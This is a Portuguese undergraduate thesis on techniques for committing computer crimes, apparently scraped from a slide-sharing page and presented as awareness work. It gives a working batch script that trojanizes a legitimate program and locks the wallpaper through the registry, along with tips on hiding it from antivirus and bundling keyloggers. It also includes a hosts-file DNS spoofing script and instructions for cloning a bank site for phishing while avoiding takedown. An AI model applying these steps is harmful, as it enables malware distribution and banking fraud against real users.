   No exemplo subsequente, será exemplificada uma forma de criar um aplicativo que o
qual, ao mesmo tempo em que executa um programa legítimo criado por outrem, de forma
transparente, executa um programa malicioso (Malware) que insere uma foto de uma caveira
como papel de parede da área de trabalho do Windows de uma maneira que não é possível
removê-la a menos que o registro do Windows seja editado. Para esta tarefa, também pode ser
utilizado o programa “Bat To Exe Converter” com a escolha de algumas opções
personalizadas.
   Neste exemplo, será adicionado o programa “instalar papel de parede.bat” e a imagem
“caveira.jpg” (que ficará como o papel de parede) ao editor de textos “Atlantis.exe”.
   O conteúdo do arquivo de execução em lotes é o seguinte:
       @echo off rem Criado para fins acadêmicos por Pedro Ramos
       @mkdir %homepath%Windows
       @move /y caveira.jpg %homepath%WindowsSystem.jpg
       @attrib +R +S +H %homepath%WindowsSystem.jpg
       @reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v Wallpaper
/t REG_SZ /d "%homepath%WindowsSystem.jpg" /f
       @reg       add    "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"   /v
WallpaperStyle /t REG_SZ /d 2 /f
       @start Atlantis.exe


   Há sete linhas de comando no arquivo (cada linha de comando começa com”@”) que são
suficientes para, de forma transparente, criar um diretório chamado “Windows” na pasta do
usuário que executar o programa, inserir o arquivo de imagem que servirá de plano de fundo
na área de trabalho (renomeado para “System.jpg”) dentro do novo diretório, ocultar e
proteger o novo arquivo, inserir alterações no registro para definir o papel de parede
impedindo ele seja alterado e, por último, executar o aplicativo original (Atlantis.exe).
53



   Ao escolher a opção “Invisible application”, somente o batch será executado de forma
“transparente”, ou seja, o editor de textos “Atlantis” será executado e funcionará
normalmente, o que permite que o programa possa ser executado diversas vezes pelo usuário
sem que ele suspeite da integridade do arquivo.


   Executar de forma invisível. Figura 25




   Diversas outras opções são disponibilizadas pelo aplicativo e podem ser utilizadas de
acordo com a função do novo programa desenvolvido. A opção “Encrypt the program”, por
exemplo, pode ser útil quando a intenção é camuflar um vírus já conhecido e evitar que ele
seja detectado pelo programa antivírus. A inclusão de quaisquer arquivos como programas,
imagens e vídeos pode ser feita ao clicar na aba “Include”.
54



   Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa que
registra as imagens da tela e as teclas digitadas pelo usuário (image keylogger) também pode
ser adicionado, possibilitando a captura de senhas de contas bancárias digitadas em teclados
virtuais, por exemplo.


   Incluir quaisquer arquivos ao programa. Figura 26




   Caso seja necessário deixar o novo programa com a aparência bem parecida à do original,
a aba “Versioninformations” oferece algumas opções.


   Incluir ícone. Figura 27
55



   Após compilado, o resultado será o seguinte:


   Comparação de arquivos. Figura 28




   É possível verificar que o arquivo gerado pelo programa é pouco maior que o original,
pois contém uma foto e um arquivo de batch. O ícone utilizado também é pouco diferente,
porém, nada impede que um ícone idêntico seja utilizado.


   4.2 DNS spoofing


   O DNS, acrônimo de (Domain Name System), é um recurso utilizado para “traduzir”
nomes de computadores/servidores para seu real endereço lógico (endereço IP). Por exemplo,
o servidor que armazena o site de buscas “Google” possui um endereço (algo como
“72.14.253.104”) que o permite ser localizado na internet. Memorizar este endereço pode não
ser uma das tarefas mais simples quando se tratar de vários sites na internet, cada um com um
endereço diferente. Além disso, mesmo que o endereço de e-mail “mario@129.2.69.24” seja
memorizado, caso ocorra uma mudança de servidor de correio eletrônico (por tornar-se
obsoleto, por exemplo) o endereço de e-mail será modificado. Para resolver esse problema
foram criadas listas contendo os nomes dos servidores e seus respectivos endereços
(TANENBAUM, 2003, p. 439).
   O DNS spoofing, é a técnica que consiste em manipular os registros de DNS de forma que
a conexão seja direcionada para um local diferente do original. Há diversas maneiras de
manipular registros de DNS e, uma das mais conhecidas é manipular um arquivo chamado
“hosts”, presente em boa parte dos sistemas operacionais.
56



   O código a seguir é um exemplo de como pode ser criado um arquivo de processamento
em lotes para manipular o arquivo “hosts” dos sistemas operacionais mais atuais da
Microsoft.
   ipconfig /flushdns
   echo. >>%systemroot%System32driversetchosts
   echo 74.6.239.84 www.google.com>>%systemroot%System32driversetchosts
   echo 74.6.239.84 www.google.com.br>>%systemroot%System32driversetchosts


   Conforme visto nos capítulos anteriores, o código acima pode ser digitado em um editor
de texto qualquer e, após ser salvo com a extensão “.bat”, pode ser compilado para executar
de forma invisível e anexado a outro arquivo íntegro. Após sua execução, toda vez que o
usuário tentar acessar o site de buscas “www.google.com.br” ou “www.google.com”, será
direcionado para o site de buscas do “Yahoo” do Reino Unido e Irlanda do Norte, cujo
endereço atual é “74.6.239.84”. A figura abaixo foi originada de um ataque experimental real.


   Redirecionamento do site. Figura 29
57



   É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereços
ainda continua a mostrar o endereço que o usuário desejava acessar. Da mesma forma que foi
possível direcionar para o “Yahoo”, um usuário que tentava acessar o “Google”, um código
semelhante ao que foi apresentado há pouco pode ser utilizado para direcionar um usuário que
queira acessar sua conta bancária ao computador de um cracker ou servidor por ele
manipulado. Caso um usuário seja direcionado para um site falso de uma instituição
financeira e o site for bem feito, dificilmente a pessoa a ser enganada desconfiará de uma
fraude. Caso o usuário que executar o arquivo malicioso tenha permissões de administrador
do sistema, dificilmente o direcionamento dos endereços não obterá êxito ou será bloqueado
por um firewall ou antivírus.


   4.3 Fraude em contas bancárias


   A invasão de contas bancárias talvez seja um dos golpes mais temidos por quem faz uso
da tecnologia para movimentações financeiras pela internet. Só no Brasil, estima-se que cerca
de 32,5 milhões de pessoas utilizam a internet para realizar transações bancárias (VALLE,
2010). Um ataque que atinja apenas um por cento deste público, afetará mais de 300 mil
pessoas. Mesmo que seja um ataque mal elaborado e de fácil percepção por parte do usuário
do sistema, caso consiga enganar apenas 0,01 por cento das pessoas afetadas pelo ataque,
mais de trinta usuários da internet poderão ter seu dinheiro roubado.
    Uma grande variedade de técnicas é utilizada para cometer crimes digitais que envolvem
instituições financeiras. Algumas delas já são bem conhecidas, por grande parte das empresas
e usuários da internet, o que leva à conclusão de que, para um criminoso realizar um ataque
com sucesso, a combinação de técnicas é o modo mais eficiente.
   Mesmo com grande investimento em segurança de informação feito por parte das
instituições financeiras, dificilmente é possível debelar crackers tenazes, o que leva a crer que
o investimento em conscientização dos usuários é uma boa medida de segurança.


         4.3.1 Pharming


       Um site falso é, atualmente, uma das ferramentas mais utilizadas por criminosos da
área de informática para enganar usuários da internet que acessam sites de instituições
financeiras. Uma das razões para a crescente prática desse tipo de crime é a facilidade com
58



que um site original pode ser copiado e a grande quantidade de usuários que são facilmente
induzidos a acessá-los. Dependendo da forma como foi desenvolvido e de sua complexidade,
muitas vezes é possível copiá-lo de forma integral, o que dificulta a percepção de que o site é
falso. Até mesmo sites mais complexos, como sites de instituições financeiras e comércios
eletrônicos, são passíveis de cópia. Qualquer usuário da internet que utilize um navegador
comum como o “Internet Explorer” pode tentar. Para exemplificar como isso pode ser feito,
foi copiado o site de uma instituição financeira.
       No navegador “Internet Explorer” foi digitado o seguinte endereço: “www.bb.com.br”.
       No menu “arquivos”, escolheu-se a opção “Salvar como...”


       Salvar site. Figura 30




   Após a escolha da opção “Salvar como...”, uma nova janela foi aberta com uma
mensagem dizendo que a página não poderia ser completamente salva e perguntando:
“Gostaria de salvar a página mesmo assim?”. Após clicar em “Sim” para a resposta à
pergunta, uma nova janela conforme a figura a seguir foi aberta.
59



       Após o site ser copiado, foi aberto o arquivo “[bb_com_br].htm” e a página da
instituição foi exibida.


       Página WEB completa. Figura 31




    Até mesmo as fotos que estavam no site foram copiadas, como é possível verificar na
imagem a seguir.


       Site falso. Figura 32




    Nem todos os arquivos podem ser baixados desta maneira e a perfeição de um site falso
dependerá inteiramente da habilidade que o cracker tem em desenvolver sites, além de sua
criatividade para modificar os itens que ele não consegue copiar com perfeição. Na imagem
60



do site falso, é possível verificar que os botões de menu que ficam logo abaixo dos locais
onde são inseridos os dados de agência e conta ficaram defeituosos. Muitos usuários não
suspeitariam que o site é falso somente por este motivo. Ainda assim, um cracker com
conhecimentos básicos de desenvolvimento de sites poderia facilmente consertar o problema.
    As telas seguintes, que servem para a autenticação de um usuário em sua conta corrente,
também podem ser falsificadas por um bom desenvolvedor de sites (Web Disigner), inclusive
os teclados virtuais. É pertinente ressaltar, também, que um cracker não precisa desenvolver
um site por completo, pois é possível utilizar informações do site oficial e repassá-las para o
usuário em tempo real, conforme abordado em capítulos posteriores.
    Após copiar e modificar o site para ter sua aparência mais parecida possível com o site
original, o cracker pode armazená-lo em um computador qualquer ou hospedá-lo em sites no
exterior. Algumas vezes são utilizadas contas falsas em sites gratuitos de hospedagem de sites,
a fim de aumentar a anonimidade do criminoso.
    Um site falso, exposto ao público da internet, rapidamente pode ser detectado e tirado do
ar (principalmente se for um site falso de uma grande instituição). Para evitar que o site seja
retirado do ar, um cracker pode utilizar diversos meios como, por exemplo, permitir que
somente endereços específicos (de clientes do banco) consigam acessar o site ou, em outros
casos, impedir somente que robôs dos sites de busca indexem o conteúdo do site. Para
impedir que os robôs dos sites de busca acessem o site, pode ser adicionada uma linha dentro
da página que contém o código fonte do site. O conteúdo abaixo é um exemplo do que pode
ser adicionado nas páginas com código fonte do site.
    <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
    Caso o cracker tenha a intenção de não ter seu site indexado pelos sites de busca, também
é possível criar um arquivo chamado “robots.txt” com o conteúdo abaixo e colocá-lo no
diretório-raiz do site.
    Conteúdo do arquivo “robots.txt”:
          User-agent: *
          Disallow: /

    Após a criação e hospedagem do site falso, o criminoso pode utilizar, entre outras
técnicas, a engenharia social para convencer o usuário a clicar em um link falso que remeta ao
site fake ou o DNS spoofing (abordado em capítulos anteriores) para que o cliente da
instituição financeira seja automaticamente direcionado ao site falso.
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f
Pedro tcc2.2.2.f

More Related Content

Similar to Pedro tcc2.2.2.f

Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...
Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...
Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...Evandro Guilherme Miguel
 
O impacto da engenharia social na segurança da informaçao
O impacto da engenharia social na segurança da informaçaoO impacto da engenharia social na segurança da informaçao
O impacto da engenharia social na segurança da informaçaoSoftD Abreu
 
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃO
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃOO IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃO
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃOSoftD Abreu
 
Artigo cientifico jonildo eric galdino ver.03
Artigo cientifico jonildo eric galdino ver.03Artigo cientifico jonildo eric galdino ver.03
Artigo cientifico jonildo eric galdino ver.03Adriano Balani
 
Monografia Marcos Bezerra 2008
Monografia Marcos Bezerra   2008Monografia Marcos Bezerra   2008
Monografia Marcos Bezerra 2008Marcos Bezerra
 
Tcc luizfernando final
Tcc luizfernando finalTcc luizfernando final
Tcc luizfernando finalluizfg56
 
Duly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdfDuly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdfHelenaReis48
 

Similar to Pedro tcc2.2.2.f (16)

Engenharia social
Engenharia socialEngenharia social
Engenharia social
 
Gesiti seguranca,inovacao-e-sociedade abipti
Gesiti seguranca,inovacao-e-sociedade abiptiGesiti seguranca,inovacao-e-sociedade abipti
Gesiti seguranca,inovacao-e-sociedade abipti
 
Gesiti seguranca,inovacao-e-sociedade abipti
Gesiti seguranca,inovacao-e-sociedade abiptiGesiti seguranca,inovacao-e-sociedade abipti
Gesiti seguranca,inovacao-e-sociedade abipti
 
Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...
Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...
Apresentação ENG PUCC - Implementação de Praticas de Segurança da Informação ...
 
Tutorialitil2
Tutorialitil2Tutorialitil2
Tutorialitil2
 
Tutorialitil2
Tutorialitil2Tutorialitil2
Tutorialitil2
 
Tutorialitil2
Tutorialitil2Tutorialitil2
Tutorialitil2
 
O impacto da engenharia social na segurança da informaçao
O impacto da engenharia social na segurança da informaçaoO impacto da engenharia social na segurança da informaçao
O impacto da engenharia social na segurança da informaçao
 
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃO
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃOO IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃO
O IMPACTO DA ENGENHARIA SOCIAL NA SEGURANÇA DA INFORMAÇÃO
 
Artigo cientifico jonildo eric galdino ver.03
Artigo cientifico jonildo eric galdino ver.03Artigo cientifico jonildo eric galdino ver.03
Artigo cientifico jonildo eric galdino ver.03
 
Palestra
PalestraPalestra
Palestra
 
Monografia Marcos Bezerra 2008
Monografia Marcos Bezerra   2008Monografia Marcos Bezerra   2008
Monografia Marcos Bezerra 2008
 
Capítulo I: A segurança de sistemas da informação & aspectos sociotécnicos
Capítulo I: A segurança de sistemas da informação  &  aspectos sociotécnicosCapítulo I: A segurança de sistemas da informação  &  aspectos sociotécnicos
Capítulo I: A segurança de sistemas da informação & aspectos sociotécnicos
 
Capítulo I: A segurança de sistemas da informação & aspectos sociotécnicos,...
Capítulo I: A segurança de sistemas da informação  &  aspectos sociotécnicos,...Capítulo I: A segurança de sistemas da informação  &  aspectos sociotécnicos,...
Capítulo I: A segurança de sistemas da informação & aspectos sociotécnicos,...
 
Tcc luizfernando final
Tcc luizfernando finalTcc luizfernando final
Tcc luizfernando final
 
Duly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdfDuly_seguranca em redes de computadores.pdf
Duly_seguranca em redes de computadores.pdf
 

Pedro tcc2.2.2.f

  • 1. FACULDADE DE TECNOLOGIA DE SÃO CAETANO DO SUL PEDRO RAMOS DE ALMEIDA JUNIOR TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA SÃO CAETANO DO SUL/SÃO PAULO 2010
  • 2. PEDRO RAMOS DE AMEIDA JUNIOR TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do Sul, sob a orientação da Professora MSc Vanessa Tatiana de Brito, como requisito parcial para a obtenção do diploma de Graduação no Curso de Segurança da Informação. São Caetano do Sul / São Paulo 2010
  • 3. Nome: ALMEIDA, Pedro Ramos de Junior. Título: TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA. Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do Sul para obtenção do diploma de Graduação. Aprovado em: Banca Examinadora Prof. Dr. ou MSc. _____________________Instituição: _______________ Julgamento: ________________Assinatura: ________________________ Prof. Dr. ou MSc. _____________________Instituição: _______________ Julgamento: _________________Assinatura: _______________________ Prof. Dr. ou MSc ______________________Instituição: _______________ Julgamento: ________________Assinatura: _________________________
  • 4. DEDICATÓRIA Dedico este trabalho a todos que de alguma forma contribuíram para sua realização, minha mãe, às pessoas que, voluntariamente, divulgam conhecimentos em prol do desenvolvimento social e tecnológico e, principalmente, ao meu avô Domingos Manha Ramirez (em memória) por sua preocupação em tentar transmitir tudo o que aprendeu ao longo da sua vida e fazer de mim uma pessoa curiosa.
  • 5. AGRADECIMENTOS Agradeço à minha orientadora e Professora Vanessa Tatiana de Brito, Prof. John Dale e Professora Cirlei Izabel da Silva Paiva pelas orientações na elaboração do trabalho. Também devo agradecimentos a Aline Ramires de Almeida, Alan Garcia, Bruno Honorio, Ana Luiza Galhumi, Professora Maria Márcia Matos Pinto e Professora Caroline Evangelista Lopes pelas revisões textuais e dicas de conteúdo.
  • 6. "Se o conhecimento pode criar problemas, não é através da ignorância que podemos solucioná-los." Isaac Asimov.
  • 7. ALMEIDA, Pedro Ramos Junior. Técnicas utilizadas para prática de crimes de informática. Xxx folhas. Trabalho de Conclusão de Curso – Faculdade de Tecnologia de São Caetano do Sul, São Caetano, 2010. Resumo Neste trabalho, são discutidas algumas das técnicas mais simples utilizadas para a prática de crimes no âmbito computacional. A metodologia adotada foi a análise de exemplos práticos de como alguns crimes são cometidos e a realização de experimentos com o objetivo abordar as falhas tecnológicas relacionadas à área de segurança de informação. Este trabalho e a adoção de tal metodologia justificam-se pela falta de consciência que muitas pessoas têm sobre a necessidade de segurança das informações. O fato é que muitos nem mesmo fazem atualizações de segurança sem saber que, mesmo sem documentos importantes, o computador pode ser utilizado remotamente para diversas finalidades. A análise dos crimes feita nesta monografia tem foco nos cometidos por pessoas que possuem conhecimento entre os níveis básico e intermediário em informática. Dentre os crimes abordados, estão os de roubo, furto, invasão de privacidade, falsidade ideológica, sequestro e até mesmo crimes hediondos. A pesquisa utiliza-se de uma linguagem simplificada e acessível, explicando termos técnicos de difícil entendimento para que, mesmo as pessoas que não estão acostumadas aos jargões da área possam entender a necessidade de se proteger contra tais crimes, após descobrir com que facilidade eles são cometidos. Os resultados obtidos pela demonstração da facilidade de se cometer crimes de informática são as medidas de segurança que usuários de sistemas de informática passarão a adotar e a conclusão de que, para se proteger, é necessário conhecer os atacantes e as técnicas de ataque. PALAVRAS-CHAVE: Crimes de informática; técnicas hacker/cracker; conscientização; segurança de informação.
  • 8. ALMEIDA, Pedro R. J. Techniques used for computer crimes. Xxx pages. Completion of coursework – São Caetano do sul College of Technology, São Caetano, 2010. Abstract In this paper, are discussed some of the simplest techniques used to commit crimes within computing. The adopted methodology was the analysis of practical examples of how some crimes are committed and the conducting experiments with the objective to broach the technological failures in the information security. This work and the adoption of such methods are justified by the lack of awareness that some people have about the importance of information security. The fact is that some people do not make security updates without knowing that, even without important documents, the computers can be used remotely by a cracker for different purposes. The analysis of the crimes that are done in this paperwork has focused on those ones committed by people who do not have experience with computers and people who have basic knowledge. Among the crimes broached in this paper are theft, invasion of privacy, forgery, kidnapping and other crimes. The research makes use of a simplified and accessible language, explaining difficult technical terms so that even people who are not accustomed to jargon can understand the necessity of protection against such crimes after discovering how easily they are committed. The results gotten from the demonstration of the easiness of committing computer crimes are the security measures that users of computer systems will take and the conclusion that, to protect the computers systems, it is necessary to know the aggressors and the attack techniques. KEYWORDS: Computer Crimes; hacker/cracker techniques; awareness; information security.
  • 9. Lista de ilustrações Figura 1 Principal obstáculo para a implementação de segurança .................................. 20 Figura 2 Resultados da pesquisa para o termo "CPF: " Mario ....................................... 21 Figura 3 Tela de recuperação retirada do DVD do Windows Vista.................................. 28 Figura 4 Prompt de comando (cmd.exe) renomeado para “sethc.exe” ............................ 30 Figura 5 Alteração da senha ................................................................................................. 31 Figura 6 Obter propriedade de arquivo .............................................................................. 32 Figura 7 Obter propriedade de arquivo (2) ….................................................................... 32 Figura 8 Obter propriedade de arquivo (3) ........................................................................ 33 Figura 9 Obtendo permissões ............................................................................................... 33 Figura 10 Tela do Windows Millennium ............................................................................. 34 Figura 11 Opções para alterar o sistema Windows ............................................................ 36 Figura 12 Opções para alterar senhas dos usuários .......................................................... 37 Figura 13 Finalização do processo de exclusão de senha ................................................... 38 Figura 14 Obter arquivos “SAM” e “system” com o sistema em execução ..................... 39 Figura 15 Utilização do Cain ................................................................................................ 40 Figura 16 Força bruta com o Cain ...................................................................................... 41 Figura 17 Crackeando .......................................................................................................... 42 Figura 18 Senhas das redes sem fio já acessadas ............................................................... 43 Figura 19 Brutus ................................................................................................................... 44 Figura 20 Wordlist ................................................................................................................. 44 Figura 21 Quebra de senha de e-mail .................................................................................. 45 Figura 22 Invasão de site ...................................................................................................... 46 Figura 23 Screenshots do batch ............................................................................................ 50 Figura 24 Compilar batch ..................................................................................................... 51 Figura 25 Executar de forma invisível …............................................................................ 53 Figura 26 Incluir quaisquer arquivos ao programa …....................................................... 54 Figura 27 Incluir ícone …...................................................................................................... 54 Figura 28 Comparação de arquivos …................................................................................ 55
  • 10. Figura 29 Redirecionamento do site …................................................................................ 56 Figura 30 Salvar site …......................................................................................................... 58 Figura 31 Página WEB completa …..................................................................................... 59 Figura 32 Site falso …............................................................................................................ 59 Figura 33 Anonymail …........................................................................................................ 61 Figura 34 Achilles ….............................................................................................................. 64 Figura 35 Configurar proxy …............................................................................................. 65 Figura 36 Dados de agência e conta corrente …................................................................. 67 Figura 37 Dados capturados …............................................................................................ 68 Figura 38 Teclado virtual …................................................................................................. 68 Figura 39 Tela de interceptação de dados do cliente …...................................................... 69 Figura 40 Tela de alerta ….................................................................................................... 70 Figura 41 Interfaces ….......................................................................................................... 72 Figura 42 Habilitar modo monitor ….................................................................................. 73 Figura 43 Airodump-ng ….................................................................................................... 73 Figura 44 Salvar pacotes capturados ….............................................................................. 74 Figura 45 Resultados do ataque PTW …............................................................................. 75 Figura 46 Autenticação falsa …............................................................................................ 76 Figura 47 Modificar o MAC …............................................................................................. 76 Figura 48 Criar e enviar pacotes forjados …...................................................................... 77 Figura 49 Enviando pacotes forjados ….............................................................................. 78 Figura 50 Capturar dados de ponto de acesso e canal específico …................................. 79 Figura 51 Verificar clientes conectados …........................................................................... 79 Figura 52 Capturando handshake …................................................................................... 80 Figura 53 Descobrir senha …................................................................................................ 81 Figura 54 Senha encontrada …............................................................................................ 81
  • 11. Sumário 1 Introdução ........................................................................................................................... 13 1.1 Objetivos ..................................................................................................................... 14 2 Conceitos básicos e definições ........................................................................................... 16 2.1 Crime ........................................................................................................................... 16 2.2 Distinções entre hacker e cracker; hackerismo e crackerismo................................. 16 2.3 Firewall ........................................................................................................................ 18 2.4 “Laranja” .................................................................................................................... 18 2.5 Segurança em ambientes corporativos ..................................................................... 18 2.6 Conscientização .......................................................................................................... 19 2.7 Obtenção de dados ..................................................................................................... 20 2.8 Como os criminosos escolhem um “laranja” ........................................................... 21 2.9 Exemplos reais de crimes ........................................................................................... 23 2.9.1 Incidentes envolvendo bancos ........................................................................... 24 2.9.2 Invasões ............................................................................................................... 24 2.9.3 Sequestro ............................................................................................................. 25 3 Técnicas e conhecimentos básicos ..................................................................................... 26 3.1 Engenharia social ........................................................................................................ 26 3.2 Outras formas de ligar o computador ....................................................................... 27 3.3 Obter acesso completo a sistemas Windows protegidos por senha ......................... 29 3.3.1 Senhas do Windows 95,98 e Millennium .......................................................... 34 3.3.2 Senhas do Windows NT e 2000 ......................................................................... 34 3.3.3 Senhas do Windows XP, 2003, Vista e 7 ........................................................... 35 3.3.4 Descobrir senhas sem alterá-las ........................................................................ 38 3.3.4.1 Senhas armazenadas no computador ..................................................... 42 3.3.4.2 Invasão de contas de e-mail e sites por meio da senha .......................... 43 4 Técnicas que demandam conhecimentos básicos ............................................................ 47 4.1 Criação de um programa para fins maliciosos ........................................................ 47 4.1.2 Arquivos de processamento em lote (batch) ..................................................... 47 4.1.2.1 Como compilar um arquivo de processamento em lotes ....................... 50 4.1.3 Como um vírus pode ser anexado a outro arquivo ......................................... 51 4.2 DNS spoofing .............................................................................................................. 55
  • 12. 4.3 Fraude em contas bancárias ...................................................................................... 57 4.3.1 Pharming ............................................................................................................. 57 4.3.2 Phishing scam e e-mail spoofing ........................................................................ 61 4.3.3 Man In The Middle (MITM) e sequestro de sessão ......................................... 63 4.4 Quebra de senhas de redes sem fio ........................................................................... 71 4.4.1 Captura de tráfego ............................................................................................. 71 4.4.2 Como quebrar senhas WEP .............................................................................. 74 4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego ............................... 76 4.4.3 Descoberta de senhas WPA/WPA2 ................................................................... 78 4.5 Computadores “zumbis” ........................................................................................... 83 4.5.1 Ataque DdoS ....................................................................................................... 83 4.5.2 Outros tipos de ataques feitos por computadores “zumbis” .......................... 85 5 Considerações finais ........................................................................................................... 86 6 Referências bibliográficas ................................................................................................. 87
  • 13. 13 1 Introdução Este estudo tem como intento descrever como alguns crimes de informática podem ser cometidos por pessoas que não possuem conhecimentos avançados na área. Muito se tem afirmado que é um “mito” a necessidade de aprender técnicas de ataque para poder se defender com eficiência (RUFINO, 2002), porém, pesquisas mostram que a quantidade de crimes cometidos pela internet cresce em ritmo acelerado (CERT.BR, 2010) e levam a crer que os atuais mecanismos de segurança adotados não são eficientes ou suficientes. Segundo pesquisas atuais, o principal fator responsável pelo grande número de problemas relacionados à segurança da informação é a má utilização das tecnologias (FECOMERCIO, 2010), e uma das medidas consideradas mais eficientes no combate aos incidentes é a conscientização dos usuários (RODRIGUES, 2010). Um profissional que atua em um seguimento completamente distinto da informática, dificilmente possui conhecimentos avançados para manipular regras de firewall, configurar seu antivírus de forma eficiente, saber quais ações tomar quando ameaças são encontradas, verificar cabeçalhos de e-mails e saber quais são confiáveis, ou ainda, deduzir com destreza em quais locais ele pode ou não clicar. Para uma pessoa que, não necessariamente precisa entender a fundo os sistemas computacionais a fim de realizar as funções correlatas à sua profissão, como um médico, advogado, metalúrgico, ou, até mesmo, pessoas que utilizam computadores com frequência, mas não necessitam de conhecimentos avançados para desempenhar suas funções, como secretárias ou gerentes de empresas, o estudo de meios técnicos utilizados para uma proteção eficiente pode causar enfado e não ser eficiente na prevenção de incidentes. Considerando como correta a conclusão de que é mais eficiente apontar as fragilidades nos processos do que apenas aconselhar usuários sobre boas práticas de segurança, neste trabalho são discutidos alguns crimes que podem ser cometidos com certa facilidade, incidentes que ocorrem com frequência, mas são encobertos para não denegrir a imagem de empresas e, é feita uma tentativa de demonstrar que nem sempre se deve confiar veementemente em sites que exibem mensagens dizendo serem cem por cento seguros ou em processos e programas que não levantam suspeitas. Devido ao rápido avanço da tecnologia, muitas das ferramentas que exploram as vulnerabilidades, técnicas de ataque e brechas de segurança aqui discutidas, certamente ficarão obsoletas com o passar do tempo e não mais poderão ser usadas. Porém, assim como
  • 14. 14 ainda hoje é possível explorar falhas e brechas existentes desde o começo da era da informática, possivelmente, muitos anos ainda serão necessários para que este trabalho se torne totalmente desatualizado, principalmente no que diz respeito à principal brecha de segurança hoje existente: as falhas humanas. É fato que as ferramentas e técnicas utilizadas por criminosos que atuam na área de informática evoluíram desde o surgimento dos primeiros computadores; no entanto, as técnicas de defesa também evoluíram de forma considerável. Com a utilização de boas ferramentas de proteção e configurações bem elaboradas, a maior brecha de segurança passa a ser a fraude ou erro humano. Para mitigar riscos oriundos de falhas humanas, dois fatores são de extrema importância: o treinamento e a conscientização. Com a falsa ideia que algumas pessoas têm sobre a frequência com que os crimes de informática são cometidos e sobre o nível de conhecimento necessário para cometê- los, convencer alguém sobre a necessidade de adotar medidas de segurança, em alguns casos, torna-se um desafio. 1.1 Objetivos O objetivo principal deste trabalho é demonstrar que, para aumentar o nível de segurança de informações em ambientes domésticos ou corporativos, a divulgação de técnicas que são utilizadas para a prática de crimes de informática pode servir como uma forma de defesa e um recurso para conscientizar pessoas sobre a necessidade de se proteger dos incidentes de informática. Até mesmo em jornais televisivos são dados conselhos de como utilizar os computadores com mais segurança; porém, ainda há pessoas que não têm medo de se expor totalmente em sites de relacionamento interpessoal, ou mesmo fazer transações bancárias em computadores cheios de vírus. Neste trabalho, a tentativa de conscientização é feita de uma forma diferente e que pode ser muito eficiente, que é demonstrar, com exemplos práticos, como é fácil, a partir de um computador, cometer atos que podem trazer sérias consequências para qualquer pessoa que utiliza a internet no seu cotidiano. Além de objetivar ajuda no trabalho de profissionais que atuam na área de segurança de informação e que precisam convencer as pessoas da necessidade de proteção, o conteúdo aqui expresso pode ser de grande valia também para usuários domésticos que se sentem seguros somente por deixar de acessar sites de bancos ou por não possuir arquivos importantes armazenados em seus computadores.
  • 15. 15 Outro objetivo importante é discutir um conhecimento erroneamente escondido, proibido em alguns sites e, muitas vezes, não transmitido nem mesmo em cursos de segurança de informação, que é o conhecimento utilizado para prática de crimes de informática. Atualmente, a divulgação de técnicas hacker/cracker é feita de uma maneira que somente pessoas interessadas no assunto, competentes administradores de redes, bons programadores ou criminosos conseguem tais informações. Em outras palavras, tal como acontece com o acesso às armas de fogo, apenas as pessoas mal intencionadas ou uma minoria de curiosos e pessoas com boas intenções detêm tais informações. Não faz parte dos objetivos deste trabalho a divulgação de conhecimentos para serem utilizados a fim de prover prejuízo alheio ou cometer qualquer forma de fraude, mesmo porque, as técnicas aqui utilizadas não são destinadas a crackers ou usuários avançados, pois estes, possivelmente já possuem conhecimento de técnicas melhor elaboradas e mais eficientes.
